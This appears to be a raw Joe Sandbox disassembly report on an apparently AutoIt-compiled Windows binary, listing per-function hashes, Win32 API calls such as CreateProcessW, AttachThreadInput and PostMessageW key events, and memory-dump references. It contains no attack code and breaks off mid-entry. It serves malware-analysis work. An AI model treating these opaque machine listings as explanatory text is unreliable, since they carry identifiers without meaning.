                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                      • Instruction ID: 46be8086737b162e3a3614e4eb83d5f89ebd326d12756a759ad28b97895518bc
                      • Opcode Fuzzy Hash: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                      • Instruction Fuzzy Hash: 6421B270A00104AFCF05AB65CCC5EFEBBA4EF85300F105129F561A72A2DB75991ADA60
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC95DF
                      • GetDlgCtrlID.USER32 ref: 00EC95EA
                      • GetParent.USER32 ref: 00EC9606
                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9609
                      • GetDlgCtrlID.USER32(?), ref: 00EC9612
                      • GetParent.USER32(?), ref: 00EC962E
                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9631
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 1536045017-1403004172
                      • Opcode ID: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                      • Instruction ID: 2a926d6013b9ea8e94e4d4cb71cc429a5762e23173e13ec5c8f8468229b54f8b
                      • Opcode Fuzzy Hash: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                      • Instruction Fuzzy Hash: 7121D675A00104BFDF04AB61CDC5EFEBBB4EF44300F105019F551A72E2DB75951ADA60
                      APIs
                      • GetParent.USER32 ref: 00EC9651
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9666
                      • _wcscmp.LIBCMT ref: 00EC9678
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC96F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ClassMessageNameParentSend_wcscmp
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 1704125052-3381328864
                      • Opcode ID: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                      • Instruction ID: ed76bc4ce7699344e0a07c639da930d4d9ba254edf61bc13e19365dc2209bc3a
                      • Opcode Fuzzy Hash: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                      • Instruction Fuzzy Hash: A911CA76248317BAFA012631ED1FEE6B7DC9F05764F20102AF900B50E2FE9399529559
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00EE8BEC
                      • CoInitialize.OLE32(00000000), ref: 00EE8C19
                      • CoUninitialize.OLE32 ref: 00EE8C23
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00EE8D23
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE8E50
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F02C0C), ref: 00EE8E84
                      • CoGetObject.OLE32(?,00000000,00F02C0C,?), ref: 00EE8EA7
                      • SetErrorMode.KERNEL32(00000000), ref: 00EE8EBA
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE8F3A
                      • VariantClear.OLEAUT32(?), ref: 00EE8F4A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID:
                      • API String ID: 2395222682-0
                      • Opcode ID: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                      • Instruction ID: d551765b782ee46ce7527f75a940ebfe4d2330a7cfe2accc1c69e562aefd4ec7
                      • Opcode Fuzzy Hash: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                      • Instruction Fuzzy Hash: 03C15371208349AFC704EF65C98492BB7E9FF88348F00592DF58AAB261DB71ED05CB52
                      APIs
                      • __swprintf.LIBCMT ref: 00ED419D
                      • __swprintf.LIBCMT ref: 00ED41AA
                        • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED41D4
                      • LoadResource.KERNEL32(?,00000000), ref: 00ED41E0
                      • LockResource.KERNEL32(00000000), ref: 00ED41ED
                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00ED420D
                      • LoadResource.KERNEL32(?,00000000), ref: 00ED421F
                      • SizeofResource.KERNEL32(?,00000000), ref: 00ED422E
                      • LockResource.KERNEL32(?), ref: 00ED423A
                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED429B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                      • String ID:
                      • API String ID: 1433390588-0
                      • Opcode ID: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                      • Instruction ID: fc764626f86826e1fda586467d89c7ef3a065758cae950f73a5392fb9b5e941a
                      • Opcode Fuzzy Hash: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                      • Instruction Fuzzy Hash: 9531B0B160121AAFDB119FA1DC84EBF7BADEF14301F044526F801F62A0E730DA52DBA0
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00ED1700
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1714
                      • GetWindowThreadProcessId.USER32(00000000), ref: 00ED171B
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED172A
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED173C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1755
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1767
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17AC
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17C1
                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17CC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                      • Instruction ID: c9ac544d49a89fc236690425e7e3aaed0fe23f31c3f6af17bdca9a0d8e61c81f
                      • Opcode Fuzzy Hash: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                      • Instruction Fuzzy Hash: 92319FB5600308BFDB21AF25DC84B7977AAEB56725F114097F800EA3A0DB71AD85DB90
                      APIs
                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7FC06
                      • OleUninitialize.OLE32(?,00000000), ref: 00E7FCA5
                      • UnregisterHotKey.USER32(?), ref: 00E7FDFC
                      • DestroyWindow.USER32(?), ref: 00EB4A00
                      • FreeLibrary.KERNEL32(?), ref: 00EB4A65
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB4A92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                      • String ID: close all
                      • API String ID: 469580280-3243417748
                      • Opcode ID: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                      • Instruction ID: 8a661d61db741646e810f949562c9a8c13416fe492d3093c30657becf9dce33c
                      • Opcode Fuzzy Hash: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                      • Instruction Fuzzy Hash: 4AA15171701212CFCB29EF14C595A6AF7A4EF04704F54A2ADE90EBB292DB30AD16CF54
                      APIs
                      • EnumChildWindows.USER32(?,00ECAA64), ref: 00ECA9A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ChildEnumWindows
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 3555792229-1603158881
                      • Opcode ID: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                      • Instruction ID: e924c0e6d2b7ede0300d30b22e58376a407680092d1b2facd0585765e7cc6286
                      • Opcode Fuzzy Hash: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                      • Instruction Fuzzy Hash: A491C63090020A9BDF08DF60D582FE9FBB4BF44308F54A12DE88AB7151DF31699ADB91
                      APIs
                      • SetWindowLongW.USER32(?,000000EB), ref: 00E72EAE
                        • Part of subcall function 00E71DB3: GetClientRect.USER32(?,?), ref: 00E71DDC
                        • Part of subcall function 00E71DB3: GetWindowRect.USER32(?,?), ref: 00E71E1D
                        • Part of subcall function 00E71DB3: ScreenToClient.USER32(?,?), ref: 00E71E45
                      • GetDC.USER32 ref: 00EACF82
                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EACF95
                      • SelectObject.GDI32(00000000,00000000), ref: 00EACFA3
                      • SelectObject.GDI32(00000000,00000000), ref: 00EACFB8
                      • ReleaseDC.USER32(?,00000000), ref: 00EACFC0
                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD04B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                      • String ID: U
                      • API String ID: 4009187628-3372436214
                      • Opcode ID: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                      • Instruction ID: 9cf75e779a09f8e8eeef9cb9278aa6bc52124556d2040424ad7d526b21ecba72
                      • Opcode Fuzzy Hash: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                      • Instruction Fuzzy Hash: 2771A334504209DFCF218F64CC84AFA7BB6FF4E364F24926AEE55BA265C7319841DB60
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                        • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                        • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                        • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                        • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC2E4
                      • ImageList_EndDrag.COMCTL32 ref: 00EFC2EA
                      • ReleaseCapture.USER32 ref: 00EFC2F0
                      • SetWindowTextW.USER32(?,00000000), ref: 00EFC39A
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC3AD
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC48F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                      • API String ID: 1924731296-2107944366
                      • Opcode ID: e56cdee118b6d25f58ecb671f45ef5eabd172c3de082e0578a9987042f2d2729
                      • Instruction ID: cc68926f0dce6d5fe7bcc6b3b0c27cd49bceea9356e0c7cdd35596fd6aba611d
                      • Opcode Fuzzy Hash: e56cdee118b6d25f58ecb671f45ef5eabd172c3de082e0578a9987042f2d2729
                      • Instruction Fuzzy Hash: E351AE70204308AFD714EF20C955F7A7BE5EF88314F10852DF695AB2E2CB71A948DB52
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EFF910), ref: 00EE903D
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EFF910), ref: 00EE9071
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE91EB
                      • SysFreeString.OLEAUT32(?), ref: 00EE9215
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                      • String ID:
                      • API String ID: 560350794-0
                      • Opcode ID: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                      • Instruction ID: 480cfd1caaaa30bd5fc30ea6611c09b72bff4c2df1599619fa81bd73bde1789d
                      • Opcode Fuzzy Hash: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                      • Instruction Fuzzy Hash: DBF11771A00209EFDB04DF95C888EAEB7B9FF89315F109059F915BB292DB31AE45CB50
                      APIs
                      • _memset.LIBCMT ref: 00EEF9C9
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB5C
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB80
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBC0
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBE2
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EEFD5E
                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EEFD90
                      • CloseHandle.KERNEL32(?), ref: 00EEFDBF
                      • CloseHandle.KERNEL32(?), ref: 00EEFE36
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                      • String ID:
                      • API String ID: 4090791747-0
                      • Opcode ID: 77b6cd6fb8e8ab6024e032eaeb34727622ebbbb4f347f4a1456b9b584284fdc1
                      • Instruction ID: 4581e4662996ba89fb1981c623fb242b4dfe0af17dbbec16d9cf60ec8c0d80d6
                      • Opcode Fuzzy Hash: 77b6cd6fb8e8ab6024e032eaeb34727622ebbbb4f347f4a1456b9b584284fdc1
                      • Instruction Fuzzy Hash: B3E1D331204385DFCB14EF25C881B6ABBE1AF84354F14956DF899AB3A2DB31EC45CB52
                      APIs
                        • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                        • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                        • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                      • lstrcmpiW.KERNEL32(?,?), ref: 00ED4FE2
                      • _wcscmp.LIBCMT ref: 00ED4FFC
                      • MoveFileW.KERNEL32(?,?), ref: 00ED5017
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                      • String ID:
                      • API String ID: 793581249-0
                      • Opcode ID: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                      • Instruction ID: 5e53962c27c090f80e207ed1c8c4215240bb3865bdce0cbdc8a23d0845172f8c
                      • Opcode Fuzzy Hash: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                      • Instruction Fuzzy Hash: 9E5176B25087859BC724EB60C8819DFB3DCEF84340F10592FF289E3191EF75A5898766
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF896E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                      • Instruction ID: 7162fd67fc240092cd8aa32f3b64522c13c83cb1a62d0cbfd2cf3c0a1d8e4275
                      • Opcode Fuzzy Hash: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                      • Instruction Fuzzy Hash: 9851AF30A0064CBFDF249F248E85BB97BA5EF04364FA06116F715F61A1DF71A990DB81
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC547
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC569
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC581
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC59F
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC5C0
                      • DestroyIcon.USER32(00000000), ref: 00EAC5CF
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC5EC
                      • DestroyIcon.USER32(?), ref: 00EAC5FB
                        • Part of subcall function 00EFA71E: DeleteObject.GDI32(00000000), ref: 00EFA757
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                      • String ID:
                      • API String ID: 2819616528-0
                      • Opcode ID: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                      • Instruction ID: 80cae0771693bc66061e210061972b9531a5eef069793ffe90b8bd77abc3698b
                      • Opcode Fuzzy Hash: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                      • Instruction Fuzzy Hash: A9516970A00209AFDB20DF25CC45BAA77E5EF59314F10952DFA06EB2A0DB70ED90DB50
                      APIs
                        • Part of subcall function 00ECAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAE77
                        • Part of subcall function 00ECAE57: GetCurrentThreadId.KERNEL32 ref: 00ECAE7E
                        • Part of subcall function 00ECAE57: AttachThreadInput.USER32(00000000,?,00EC9B65,?,00000001), ref: 00ECAE85
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B70
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EC9B8D
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EC9B90
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9B99
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EC9BB7
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BBA
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EC9BC3
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EC9BDA
